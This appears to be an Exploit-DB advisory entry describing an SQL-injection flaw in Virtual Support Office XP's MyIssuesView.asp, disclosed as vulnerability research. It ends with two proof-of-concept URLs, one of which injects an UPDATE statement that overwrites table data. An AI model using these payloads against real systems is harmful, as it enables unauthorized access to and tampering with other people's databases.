Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection

EDB-ID:

31404




Platform:

ASP

Date:

2008-03-13


source: https://www.securityfocus.com/bid/28247/info

Virtual Support Office XP (VSO-XP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--